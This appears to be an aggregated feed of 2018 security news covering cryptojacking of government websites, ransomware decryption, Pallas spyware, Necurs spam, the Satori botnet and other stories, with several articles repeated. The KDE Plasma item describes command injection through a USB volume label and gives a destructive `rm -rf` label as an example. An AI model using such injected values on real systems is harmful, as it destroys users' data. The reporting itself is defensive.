The post UK government websites infected by cryptocurrency miners appeared first on The Cyber Security Place.

Ransomware costs European SMBs £71 million in downtime

Some businesses still decide to pay the ransom as they see it as a cheap way out.Ransomware costs European businesses £71 million in downtime, a new report by Datto argues.

The post Ransomware costs European SMBs £71 million in downtime appeared first on The Cyber Security Place.

Episode 83: Who is hacking the Olympics? Octoly’s Influencer Breach and Google plays HTTPS Hardball

In this week’s Security Ledger Podcast (#83): McAfee Chief Scientist Raj Samani talks to us about that company’s research into a string of targeted attacks on the organizers of the 2018 Winter Olympics in PyeongChang, South Korea. Also: information on 12,000 YouTube stars, Instagram power users and other online influencers was leaked...

Read the whole entry... »

Related Stories

Victims of the current version of the Cryakl ransomware can decrypt their files for free

Free decryption keys for the Cryakl ransomware were added to the free Rakhni Decryptor that could be downloaded on the NoMoreRansom website.

The Belgian Federal Police has located the command and control server used by a criminal organization behind the Cryakl ransomware. The server was located in an unspecified neighboring country, law enforcement seized it and shared the decryption keys found on the machine with the No More Ransom project.

“The Belgian Federal Police is releasing free decryption keys for the Cryakl ransomware today, after working in close cooperation with Kaspersky Lab. The keys were obtained during an ongoing investigation; by sharing the keys with No More Ransom the Belgian Federal Police becomes a new associated partner of the project – the second law enforcement agency after the Dutch National Police.” reads the statement published by the Europol.

“Led by the federal prosecutor’s office, the Belgian authorities seized this and other servers while forensic analysis worked to retrieve the decryption keys. Kaspersky Lab provided technical expertise to the Belgian federal prosecutor and has now added these keys to the No More Ransom portal on behalf of the Belgian federal police. This will allow victims to regain access to their encrypted files without having to pay to the criminals.”

The “exponential” rise in Ransomware threat represents a serious problem for users online and it is a profitable business for cyber criminals. The operation NO More Ransom is the response of the Europol of the growing threat.

Cryakl ransomware

Victims of Cryakl ransomware can recover encrypted files using the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom at the following URL.

The tool works with most versions of the Cryakl ransomware, but researchers at MalwareHunterTeam confirmed that it doesn’t work with versions newer than CL 1.4.0.

It has been estimated that the tool has helped more than 35,000 victims of ransomware to decrypt their files for free, an overall loss for crooks of over €10m.

“There are now 52 free decryption tools on www.nomoreransom.org, which can be used to decrypt 84 ransomware families. CryptXXX, CrySIS and Dharma are the most detected infections.” continues the statement.

The Belgian authorities are still investigating the case.

 

Pierluigi Paganini

(Security Affairs – Cryakl ransomware, cybercrime)

The post Victims of the current version of the Cryakl ransomware can decrypt their files for free appeared first on Security Affairs.

Thousands of Government Websites Hacked to Mine Cryptocurrencies

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies. Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors' computers to mine

Thousands of government, orgs’ websites found serving crypto mining script

On Sunday, over 4,200 websites around the world started hijacking visitors’ browsers to mine the Monero crypto currency. The attack The problem was first noticed and partly documented by security researcher Scott Helme: Ummm, so yeah, this is *bad*. I just had @phat_hobbit point out that @ICOnews has a cryptominer installed on their site… 😮 pic.twitter.com/xQhspR7A2f — Scott Helme (@Scott_Helme) February 11, 2018 Among the compromised websites were that of UK’s Information Commissioner’s Office and … More

Cybersecurity week Round-Up (2018, Week 6)

Cybersecurity week Round-Up (2018, Week 6) -Let’s try to summarize the most important event occurred last week in 3 minutes.

Cyber criminals continue to target cryptocurrency industry with malware and phishing attacks.

Security researchers at Netlab have spotted a new Android mining botnet, dubbed ADB.miner, that targets devices with ADB interface open.

An international operation conducted by law enforcement allowed to dismantle the crime ring behind the Luminosity RAT. US authorities also announced to took down the global cyber theft ring known as Infraud Organization.

Good news for the Popular British hacktivist Lauri Love that will not be extradited to US, UK Court Ruled. The list of victims of the hacker includes the FBI, the Federal Reserve Bank NASA and the US Missile Defence Agency..

While Cisco and FireEye confirmed that North Korean Hacking Group exploited the recently discovered Adobe Flash 0-Day flaw,  Adobe rolled out an emergency patch that fixed it.

A security researcher ported the three NSA exploits released by Shadow Brokers crew to Metasploit, including EternalRomance.

For the second time, CISCO issues a security patch to fix a critical vulnerability in CISCO Adaptive Security Appliance. The company confirmed that threat actors are already attempting to exploit itare already attempting to exploit itin the wild .

While Intel releases new Spectre security updates, currently only for Skylake chips, VMware issues temporary mitigations for Meltdown and Spectre flaws.

The source code of the Apple iOS iBoot Bootloader leaked online, while Apple downplays the data leak security experts warn hacker can use it for a future jailbreak.

Swisscom data breach Hits 800,000 Customers, roughly 10% of Swiss population.

Crooks and experts devised new methods to exfiltrate data from compromised systems. Researchers at Forcepoint discovered a new piece of malware dubbed UDPOS that exfiltrates credit card data DNS queries.

The week ended with the discovery of an unpatchable flaw in Nintendo Switch bootROM by fail0verflow hacker group that exploited it to runs Linux OS on the console.

This week a researcher at Trustwave disclosed many vulnerabilities in NETGEAR routers, and Lenovo patches critical flaws that affect Broadcoms chipsets in dozens of Lenovo ThinkPad.

https://youtu.be/wVrJF7H4n1k

 

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 6) appeared first on Security Affairs.

CSE CybSec ZLAB Malware Analysis Report: Dark Caracal and the Pallas malware family

Researchers from CSE ZLAB malware Analysis Laboratory analyzed a set of samples of the Pallas malware family used by the Dark Caracal APT in its hacking operations.

The malware researchers from ZLab analyzed a collection of samples related to a new APT tracked as Dark Caracal, which was discovered by Electronic Frontier Foundation in collaboration with Lookout Mobile Security.

Dark Caracal has been active at least since 2012, but only recently it was identified as a powerful threat actor in the cyber arena.

The first analysis of the APT linked it to Lebanese General Directorate of General Security.

Dark Caracal is behind a number of stealth hacking campaigns that in the last six years, aimed to steal text messages, call logs, and files from journalists, military staff, corporations, and other targets in 21 countries worldwide.

One of their most powerful campaigns started in the first months of last year, using a series of trojanized Android applications to steal sensitive data from the victim’s mobile device. The trojan injected in these applications is known in the threat landscape with the name Pallas.

Threat actors use the “repackaging” technique to generate its samples, they start from a legitimate application and inject the malicious code before rebuilding the apk.

The target applications belongs to specific categories, such as social chat app (Whatsapp, Telegram, Primo), secure chat app (Signal, Threema), or software related to secure navigation (Orbot, Psiphon).

The attackers used social engineering techniques to trick victims into installing the malware. Attackers use SMS, a Facebook message or a Facebook post, which invites the victim to download a new version of the popular app through from a specific URL

http://secureandroid[.]info,

All the trojanized app are hosted at the same URL.

Dark Caracal

Figure 1 – Dark Caracal Repository – Malicious site

This malware is able to collect a large amount of data and to send it to a C&C through an encrypted URL that is decrypted at runtime. The capabilities of the trojan are:

  • Read SMS
  • Send SMS
  • Record calls
  • Read calls log
  • Retrieve account and contacts information
  • Gather all stored media and send them to C2C
  • Download and install other malicious software
  • Display a phishing window in order to try to steal credentials
  • Retrieve the list of all devices connected to the same network

Further details are included in the complete report published by CSE.

You can download the full ZLAB Malware Analysis Report at the following URL:

20180212_CSE_DARK_CARACAL_Pallas_Report.pdf

Pierluigi Paganini

(Security Affairs – Dark Caracal, Pallas malware)

The post CSE CybSec ZLAB Malware Analysis Report: Dark Caracal and the Pallas malware family appeared first on Security Affairs.

Hackers hijack government websites with cryptocurrency mining malware

Cryptocurrency-mining hackers attack government websites including UK and US

Scott Helme, a UK-based security researcher, discovered that more than 4,200 websites, including several government ones, were infected on Sunday with a virus that helps criminals mine cryptocurrencies.

Apparently, hackers managed to inject Coinhive cryptocurrency-mining code in the U.S. and U.K. government websites that forces web browsers to secretly mine cryptocurrency. As a result, innocent visitors who visited these compromised websites would have their computers and phones commandeered in order to mine cyrptocurrencies for the criminals.

According to reports, websites that were infected with virus include those belonging to the Information Commissioner’s Office (ICO), Student Loans Company and Scottish NHS helpline among others. The list of 4,200-plus affected websites can be found here.

In fact, ICO, the website of UK’s data protection watchdog, was taken offline after they were warned that hackers were taking control of visitors’ computers to mine cryptocurrency. The ICO said: “We are aware of the issue and are working to resolve it.”

Helme said he was informed by a friend who had received a malware warning when he visited UK government site, ico.org.uk. He found that the website was using the Coinhive in-browser mining (cryptojacking) script that caused the visitors machines to use their CPU to mine the digital currency called Monero.

On investigating further, Helme found that several other government websites from various countries such as uscourts.gov, gmc-uk.gov, nhsinform.scot, manchester.gov.uk, and many more too had started injecting a Coinhive miner.

The affected code injected in the above websites was a malicious version of a widely used text-to-speech accessibility script known as Browsealoud, which is used to help blind and partially sighted people access the web, the report says.

British tech company Texthelp, the company which makes the plug-in, confirmed that the Browsealoud script was compromised but no other Texthelp services were affected.

In a statement, Martin McKay, Texthelp’s Chief Technology Officer (CTO), in a statement said the compromise was a criminal act and an investigation is underway.

“Users who visit the hacked sites will immediately have their computers’ processing power hijacked to mine cryptocurrency – potentially netting thousands for those responsible. Government websites continue to operate securely.

“The company has examined the affected file thoroughly and can confirm that it did not redirect any data, it simply used the computers’ CPUs to attempt to generate cryptocurrency,” it said.

“The Browsealoud service has been temporarily taken offline and the security breach has already been addressed, however Browsealoud will remain offline until Tuesday 12.00 GMT.

“At this stage there is nothing to suggest that members of the public are at risk.”

Talking about the attack, Helme said, “This type of attack isn’t new – but this is the biggest I’ve seen. A single company being hacked has meant thousands of sites impacted across the UK, Ireland and the United States.

“Someone just messaged me to say their local government website in Australia is using the software as well.”

A spokesperson for the National Cyber Security Centre (NCSC) said: “NCSC technical experts are examining data involving incidents of malware being used to illegally mine cryptocurrency.

“The affected services has been taken offline, largely mitigating the issue. Government websites will continue to operate securely. At this stage there is nothing to suggest that members of the public are at risk.”

The post Hackers hijack government websites with cryptocurrency mining malware appeared first on TechWorm.

NoMoreRansom: Free Decryption for Latest Cryakl Ransomware

Decryption keys for a current version of Cryakl ransomware have been obtained and uploaded to the NoMoreRansom website. Victims of Cryakl can potentially recover encrypted files with the Rakhni Decryptor available for free from Kaspersky Lab or NoMoreRansom.

read more

HOTforSecurity: Uh-oh. How just inserting a USB drive can pwn a Linux box

Remember the notorious Stuxnet worm?

It was a highly-sophisticated piece of malware – developed by the United States and Israeli intelligence – which targeted Iran’s Natanz uranium enrichment facility.

One of the things which made Stuxnet so notable was that it exploited a zero-day vulnerability in Windows, meaning that it could infect a Windows computer (even with Windows AutoRun and AutoPlay disabled) just by plugging in an infected USB stick.

The exploit was in how Microsoft Windows handled .LNK shortcut files, and meant that malicious code could be run on a computer without any user interaction – just inserting the thumb drive was enough.

Of course, this vulnerability was uncovered back in 2010. Nothing like that would ever happen these days… right?

Sadly for Linux users running the KDE Plasma desktop environment, they find themselves now facing a similar scenario. If anything it’s worse, according to a security advisory released late last week.

In short, if a USB memory stick is plugged into a vulnerable computer has a volume label containing the characters `` or $(), the text contained within the characters will be executed as shell commands.

Or, to put it another way, give a USB drive the volume name `rm -rf`, and hand it to a friend who runs KDE Plasma on their Linux box, and they won’t be your friend much longer.

Of course, this isn’t the sort of attack that could be conducted remotely. An attacker needs to have physical access to the vulnerable computer, or maybe sneakily leave it lying around in a car park in the hope that an unsuspecting user will plug it into their computer out of curiosity.

It’s easy to imagine how both malicious attackers and immature pranksters might attempt to abuse this flaw, so make sure that any vulnerable Linux computers under your control are properly protected.

KDE Plasma users are advised to update their systems as soon as possible to version 5.12.0 or later.

Astonishingly, in 2015 it was discovered that Microsoft’s 2010 attempt to patch the USB flaw had been insufficient, and so it had another go.

Let’s hope KDE Plasma has better luck than Microsoft.



HOTforSecurity

Uh-oh. How just inserting a USB drive can pwn a Linux box

Remember the notorious Stuxnet worm?

It was a highly-sophisticated piece of malware – developed by the United States and Israeli intelligence – which targeted Iran’s Natanz uranium enrichment facility.

One of the things which made Stuxnet so notable was that it exploited a zero-day vulnerability in Windows, meaning that it could infect a Windows computer (even with Windows AutoRun and AutoPlay disabled) just by plugging in an infected USB stick.

The exploit was in how Microsoft Windows handled .LNK shortcut files, and meant that malicious code could be run on a computer without any user interaction – just inserting the thumb drive was enough.

Of course, this vulnerability was uncovered back in 2010. Nothing like that would ever happen these days… right?

Sadly for Linux users running the KDE Plasma desktop environment, they find themselves now facing a similar scenario. If anything it’s worse, according to a security advisory released late last week.

In short, if a USB memory stick is plugged into a vulnerable computer has a volume label containing the characters `` or $(), the text contained within the characters will be executed as shell commands.

Or, to put it another way, give a USB drive the volume name `rm -rf`, and hand it to a friend who runs KDE Plasma on their Linux box, and they won’t be your friend much longer.

Of course, this isn’t the sort of attack that could be conducted remotely. An attacker needs to have physical access to the vulnerable computer, or maybe sneakily leave it lying around in a car park in the hope that an unsuspecting user will plug it into their computer out of curiosity.

It’s easy to imagine how both malicious attackers and immature pranksters might attempt to abuse this flaw, so make sure that any vulnerable Linux computers under your control are properly protected.

KDE Plasma users are advised to update their systems as soon as possible to version 5.12.0 or later.

Astonishingly, in 2015 it was discovered that Microsoft’s 2010 attempt to patch the USB flaw had been insufficient, and so it had another go.

Let’s hope KDE Plasma has better luck than Microsoft.

Necurs Spammers Go All In to Find a Valentine’s Day Victim

Love is in the air — or, in this case, your spam folder. IBM X-Force observed a massive uptick from the Necurs botnet that is focused on dating spam. It started in mid-January 2018 and will continue as Valentine’s Day draws near.

The Necurs botnet is notorious for its massive spam campaigns and is believed to control up to 6 million zombie bots. This botnet is best known for its ties to malware gangs that spread banking Trojans, such as Dridex and TrickBot, and ransomware such as Locky, Scarab and Jaff.

But Necurs is not only about malware. Its operators dabble in distributing spam for other fraud endeavors as well, which brings to light this recent romance scam campaign.

In 2017, X-Force observed Necurs sending mass amounts of pump-and-dump stock scams designed to make recipients believe a penny stock was about to rise in value. Once enough people buy the stock and it actually rises in value, the scammers sell off their shares to make a profit. The penny stock then drops back to its real market value, and those who bought it are often left with nothing but losses. In early 2018, the botnet was part of large cryptocurrency scams, and this latest bout of dating spam is yet another major campaign linking Necurs to shady online activity.

Massive Spam in Season

Preying on seasonal trends is probably the top characteristic of email spam. The first quarter of the year typically plagues email recipients with tax season spam and romance scams that start arriving in January leading up to Valentine’s Day.

The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.

IBM X-Force ResearchFigure 1: Spam volumes recorded since Jan. 1 with peaks of Necurs-generated spam (Source: IBM X-Force)

Convincing Correspondence

Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.

Each spam message comes from a disposable email address carrying the alleged writer’s name, but then asks the recipient to contact the writer back using another email address associated with another person’s name.

IBM X-Force Research

IBM X-Force Research

Necurs botnet romance scam spam

Figure 2: Screen captures of email samples spewed by Necurs botnet in its dating spam campaign (Source: IBM X-Force)

Many of the messages indicated that the recipient had a profile on Facebook or Badoo, a dating-focused social network founded in 2006 by Russian entrepreneur Andrey Andreev. Badoo is the third most popular dating app in Russia, but it is also available internationally.

Spam featuring messages from supposedly interested women is an old ploy. Such emails usually feature nothing more than basic text and are not likely to lure many people in. However, when it comes to spam, mass volume makes for a numbers game, and fraudsters only need a small percentage of recipients to reply. The threat actors behind this campaign will likely lure their victims to share revealing photos and extort them, ask for money to come visit or simply infect them with malware.

Learn how to mitigate malware in a modern, mobile world

Necurs’ Spamming Power

Overall, X-Force recorded over 230 million dating spam emails from the Necurs botnet, suggesting a capacity to distribute very large amounts of junk email. The spam was sent from roughly 950,000 different IP addresses. The top sender on the IP list was an address hosted via a Pakistani-based ISP. That IP address (103.255.5.117) had been reported as a spammer 655 times at the time of this writing and the IBM X-Force Exchange set its risk level at 10, the highest possible score.

Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.

Necurs Botnet romance scams

Figure 3: Top sending countries in Necurs dating spam campaign (Source: IBM X-Force)

After the recent takedowns of the Andromeda and Avalanche botnets, Necurs is probably the largest spam distributor serving cybercriminals at this time. According to X-Force’s ongoing monitoring of Necurs’ activity, the botnet’s established status in the cybercrime world attracts both lower-grade spammers and elite gangs seeking to spread their malware.

Say No to Spam

The operators of Necurs and other botnets have one goal: to get spam messages into people’s mailboxes without being filtered or blocked. These botnets often shuffle their methods, changing up the types of spam they spread and devising new ways to conceal it in varying file types and email ploys. As a result, spam from Necurs could find its way into both consumer and employee mailboxes. The best way to thwart these scams is to increase employee awareness about the types of malicious emails they should never open or respond to.

For more tips to avoid spammers’ bait, read our malware mitigation tips article.

The post Necurs Spammers Go All In to Find a Valentine’s Day Victim appeared first on Security Intelligence.

49% of crypto mining scripts are deployed on pornographic related websites

The number of crypto mining scripts discovered by security experts continues to increase, especially those ones illegally deployed by hacking servers online.

The experts from Qihoo 360’s Netlab analyzed crypto mining scripts online by analyzing DNS traffic with its DNSMon system. The experts were able to determine which sites load the scripts from domains associated with in-browser mining services.

According to the researchers, 49% of crypto mining scripts are deployed on pornographic related websites.

The study revealed that cryptocurrency mining scripts are also deployed on fraud sites (8%), advertising domains (7%), and cryptocurrency mining (7%).

0.2% of websites have web mining code embedded in the homepage : 241 (0.24%) in Alexa Top 100,000 websites, 629 (0.21%) in Alexa Top 300,000 websites” reads the analysis published by NetLab. 

“Pornographic related websites are the main body , accounting for 49% of these websites. Others include fraud (8%), advertising (7%), mining (7%), film and television (6%) and other categories”

The most used crypto mining script is Coinhive (68%+10%), followed by JSEcoin (9%).

crypto currency mining scripts

The fact that cryptocurrency mining scripts are most deployed on porn websites is not a surprise because they have a large number of visitors that used to spend a lot of time watching their content.

Mining activities online are rapidly increasing, the following graph shows the mining site DNS traffic trends:

crypto currency mining scropts 2.png

Below the categories of new actors most involved in mining activities:

  • Advertisers : The mining activity of some websites is introduced by the advertisers’ external chains
  • Shell link : Some websites will use a “shell link” to obscure the mining site link in the source code
  • Short domain name service provider : goobo . COM .br Brazil is a short domain name service provider, the website home page, including a short domain name through the service generated when access to the link will be loaded coinhive mining
  • Supply chain contamination : the WWW . Midijs . NET is a JS-based MIDI file player, website source code used in mining to coinhive
  • Self-built pool : Some people in github open source code , can be used to build from the pool
  • Web users informed mining : authedmine . COM is emerging of a mining site, the site claims that only a clear case of known and authorized users, began mining
 

Pierluigi Paganini

(Security Affairs – crypto currency mining scripts, Monero)

The post 49% of crypto mining scripts are deployed on pornographic related websites appeared first on Security Affairs.

Security Affairs: FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility because they are suspected for trying to using a supercomputer at the plant to mine Bitcoin.

The peaks reached by the values of principal cryptocurrencies is attracting criminal organizations, the number of cyber-attacks against the sector continues to increase, and VXers are focusing their efforts on the development of cryptocurrency/miner malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at  Radiflow, a provider of cybersecurity solutions for critical infrastructure, have discovered in a water utility the first case of a SCADA network infected with a Monero cryptocurrency-mining malware.

Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

The Radiflow revealed that the cryptocurrency malware was designed to run in a stealth mode on a target system and even disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have e dramatic impact on ICS and SCADA systems because it could increase resources consumption affecting the response times of the systems used to control processes in the environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities charged for mining cryptocurrency with “office computing resources.”

The nuclear research plant is located in Sarov, in 2011, the Russian Federation Nuclear Center deployed on a new petaflop-supercomputer.

The scientists are accused to have abused the computing power of one of Russia’s most powerful supercomputers located in the Federal Nuclear Center to mine Bitcoins.

Russian Federation Nuclear Center facility

The supercomputer normally isolated from the Internet, but the researchers were discovered while attempting to connect it online. the Federal Security Service (FSB) has arrested the researchers.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,”

 

Pierluigi Paganini

(Security Affairs – Russian Federation Nuclear Center facility, Mining)

The post FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins appeared first on Security Affairs.



Security Affairs

FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins

Russian authorities have arrested some employees at the Russian Federation Nuclear Center facility because they are suspected for trying to using a supercomputer at the plant to mine Bitcoin.

The peaks reached by the values of principal cryptocurrencies is attracting criminal organizations, the number of cyber-attacks against the sector continues to increase, and VXers are focusing their efforts on the development of cryptocurrency/miner malware.

In a few days, security firms have spotted several huge botnets that were used by crooks to mine cryptocurrencies.

This week, security experts at  Radiflow, a provider of cybersecurity solutions for critical infrastructure, have discovered in a water utility the first case of a SCADA network infected with a Monero cryptocurrency-mining malware.

Radiflow, a provider of cybersecurity solutions for critical infrastructure, today announced that the company has revealed the first documented cryptocurrency malware attack on a SCADA network of a critical infrastructure operator.” reads the press release published by the company.

The Radiflow revealed that the cryptocurrency malware was designed to run in a stealth mode on a target system and even disable security software.

“Cryptocurrency malware attacks involve extremely high CPU processing and network bandwidth consumption, which can threaten the stability and availability of the physical processes of a critical infrastructure operator,” explained Yehonatan Kfir, CTO at Radiflow. “While it is known that ransomware attacks have been launched on OT networks, this new case of a cryptocurrency malware attack on an OT network poses new threats as it runs in stealth mode and can remain undetected over time.”

A cryptocurrency malware infection could have e dramatic impact on ICS and SCADA systems because it could increase resources consumption affecting the response times of the systems used to control processes in the environments.

While the story was making the headlines, the Russian Interfax News Agency reported that several scientists at the Russian Federation Nuclear Center facility (aka All-Russian Research Institute of Experimental Physics) had been arrested by authorities charged for mining cryptocurrency with “office computing resources.”

The nuclear research plant is located in Sarov, in 2011, the Russian Federation Nuclear Center deployed on a new petaflop-supercomputer.

The scientists are accused to have abused the computing power of one of Russia’s most powerful supercomputers located in the Federal Nuclear Center to mine Bitcoins.

Russian Federation Nuclear Center facility

The supercomputer normally isolated from the Internet, but the researchers were discovered while attempting to connect it online. the Federal Security Service (FSB) has arrested the researchers.

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency.

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,”

 

Pierluigi Paganini

(Security Affairs – Russian Federation Nuclear Center facility, Mining)

The post FSB arrested researchers at the Russian Federation Nuclear Center for using a supercomputer to mine Bitcoins appeared first on Security Affairs.

8 Easy Ways to Hack-Proof Your Family’s Smartphones

Smartphones have changed the face of parenting in profound ways. But for all the efficiency they’ve introduced into family life, those same devices simultaneously bring risk.

With smartphone and tablet use growing at ten times the rate of PCs, hackers know precisely where to shift their focus these days. Cyber thieves love smartphones because once inside, they can access private information, location, email, photos, social media, and bank accounts.

If you’re a parent, a smartphone breach is an even bigger deal. Shoring up the security gaps in your phone isn’t a big deal but what about the other four or more smartphones under your roof? If you were to multiply the risk, you’d soon realize the potential havoc that’s looming.

While you can’t shut out every digital risk, you can tackle the most prominent ones. Let’s get started!

8 Ways to Hack-Proof Your Family’s Smartphones

  1. Think Like a Criminal. Work a potential hack backward. Look at every possible entryway into your phone and ask yourself, “How could I get into this phone if I were determined?” Then, methodically lock up each digital door. Challenge yourself to find every security gap. Examine your password strength, social profiles, web browsing security, general and app settings.
  2. Juice Up Your Password. How do you create a password that a criminal can’t hack? With great intention and a few extra layers. 1) Avoid the common error of using easy passwords such as “12345” or “password.” Get complex and create a combination that isn’t logical. 2) Use multi-factor authentication (MFA). Having multiple factors to authenticate your phone use such as your fingerprint, face, or a trusted device, increases security. Most smartphones offer MFA so, even if it seems tedious, use it. The more factors — or digital layers — you can combine, the more protected your smartphone will be. Too many passwords crowding your brain? Consider a password manager.
  3. Trust No App. Not all apps you download to your phone are created equal. Many third-party apps do not go through rigorous security vetting of Google or Apple. Hackers can infect apps with malware or viruses that demolish your phone’s security and allow hackers access to your data. Beware. Examine all apps, read reviews, and steer clear of apps that ask for too much access. Even legitimate apps can be used for malicious purposes such as listening in via a phone’s microphones and even spying using a phone’s camera. To pull back an app’s access, just go to your settings. On Android: Go to Apps and Notifications, choose App Permissions and make changes. On iOS: Go to your settings, select Privacy, and make changes to app permissions accordingly.
  4. Passcode, Track Your Phone. Be proactive in case your phone gets stolen or lost. Make sure your device is passcode and fingerprint protected. Take a few minutes to enable phone tracking. For Android, you’ll download the app Find My Device and for Apple use Find My iPhone. Make sure those apps are always enabled on your phone. If your phone is lost or stolen it can be tracked online.
  5. Log out, Lock Online Services. If you bank, shop, or access sensitive accounts via your smartphone do it with extreme care. This means logging out and locking those accounts when not in use and avoiding using auto-login features. Instead, use a password manager app the forces you to re-enter a master password each time you want to access an account. It’s worth the extra step. An essential part of this equation is disabling keychain and auto-fill in your browser. You can do this by finding your web browser in Settings and toggling each option to OFF. Also, avoid using public Wi-Fi for accessing sensitive accounts or conducting any transactions.
  6. Turn Off Bluetooth. Bluetooth carries inherent vulnerabilities and is another open door for hackers to enter. When Bluetooth is turned on it is constantly looking for other open connections. Hackers work quickly through open Bluetooth connections, and often victims don’t even know there’s been a breach (there’s no evidence a phone has connected with a criminal source). Make sure to switch Bluetooth off if you are not using it.
  7. Take Updates Seriously. Because people design phones, phones will be flawed. And, it’s just a matter of time before a hacker discovers and exploits those flaws. Developers use updates to combat all kinds of breaches, which make them critical to your phone’s security. Along with staying on top of updates, consider the added safeguard of antivirus, identity, and privacy protection that covers all family devices.
  8. Stop! Don’t Click that Link. Unless you are 100% sure of the legitimacy of a link sent to you through text, email, or direct message, do not click it. Random links sent by hackers to access your data are getting more and more sophisticated as well as destructive.toni page birdsong 

     

    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 8 Easy Ways to Hack-Proof Your Family’s Smartphones appeared first on McAfee Blogs.

New ‘UDPoS’ Malware Exfiltrates Credit Card Details via DNS Server

Researchers have identified a new strain of point-of-sale (PoS) malware that impersonates a LogMeIn service pack to steal credit card data via a DNS server. According to security firm Forcepoint, the malware – dubbed “UDPoS” – is unusual in that it generates a large amount of UDP-based DNS traffic to exfiltrate magnetic strip payment card […]… Read More

The post New ‘UDPoS’ Malware Exfiltrates Credit Card Details via DNS Server appeared first on The State of Security.

McAfee Blogs: Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai

Like a zombie rising from the dead, a new botnet is reemerging from the remains of Mirai malware. Specifically, modern-day threat actors are breathing life into a fast-evolving botnet called Satori by repurposing some of the source code from Mirai. And now, Satori is creating zombies of its own, as its been found hijacking internet-connected devices and turning them into an obedient botnet army that can be remotely controlled in unison.

Satori, as of now, is a work in progress. But that also means it’s evolving rapidly. Satori knows that agility equates to survival — we’ve seen it adapt to security measures and transcend its former self time and time again. Researchers have even taken down the main Satori C&C server, only to find the botnet remerge shortly after.

So it’s no surprise that it recently reemerged stronger than ever before. The current version has been found targeting software associated with ARC processors, which are used in a variety of IoT devices. Once it finds a weakness in an IoT device, Satori checks to see if default settings have been changed, and gains control of any machine that still has them. From there, it connects to the larger network and gains control of other devices that may be on it. So far, Satori has only managed to enslave a small number of devices. But once its army becomes large enough, it can be summoned to pump out masses of e-mail spam, incapacitate corporate websites, or even bring down large chunks of the internet itself.

Apparently, Satori doesn’t just take code from Mirai, it takes cues too – as these efforts are reminiscent of the infamous Mirai DDoS attack. But we can take cues from Mirai too in order to prepare for a potential Satori attack. First and foremost, every owner of an IoT device must change the default settings immediately – a necessary security precaution that many don’t take, which gave Mirai the firepower it needed in the first place. From there, users should disable telnet access from the outside and use SSH for remote administration if needed. However, this responsibility falls on the shoulders of manufacturers too, as they should enforce these settings by default. If both users and vendors follow these simple security steps, we can stunt Satori’s growth and stifle its Mirai-inspired ambitions entirely.

To learn more about the Satori botnet, and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai appeared first on McAfee Blogs.



McAfee Blogs

Satori Botnet Turns IoT Devices Into Zombies By Borrowing Code from Mirai

Like a zombie rising from the dead, a new botnet is reemerging from the remains of Mirai malware. Specifically, modern-day threat actors are breathing life into a fast-evolving botnet called Satori by repurposing some of the source code from Mirai. And now, Satori is creating zombies of its own, as its been found hijacking internet-connected devices and turning them into an obedient botnet army that can be remotely controlled in unison.

Satori, as of now, is a work in progress. But that also means it’s evolving rapidly. Satori knows that agility equates to survival — we’ve seen it adapt to security measures and transcend its former self time and time again. Researchers have even taken down the main Satori C&C server, only to find the botnet remerge shortly after.

So it’s no surprise that it recently reemerged stronger than ever before. The current version has been found targeting software associated with ARC processors, which are used in a variety of IoT devices. Once it finds a weakness in an IoT device, Satori checks to see if default settings have been changed, and gains control of any machine that still has them. From there, it connects to the larger network and gains control of other devices that may be on it. So far, Satori has only managed to enslave a small number of devices. But once its army becomes large enough, it can be summoned to pump out masses of e-mail spam, incapacitate corporate websites, or even bring down large chunks of the internet itself.

Apparently, Satori doesn’t just take code from Mirai, it takes cues too – as these efforts are reminiscent of the infamous Mirai DDoS attack. But we can take cues from Mirai too in order to prepare for a potential Satori attack. First and foremost, every owner of an IoT device must change the default settings immediately – a necessary security precaution that many don’t take, which gave Mirai the firepower it needed in the first place. From there, users should disable telnet access from the outside and use SSH for remote administration if needed. However, this responsibility falls on the shoulders of manufacturers too, as they should enforce these settings by default. If both users and vendors follow these simple security steps, we can stunt Satori’s growth and stifle its Mirai-inspired ambitions entirely.

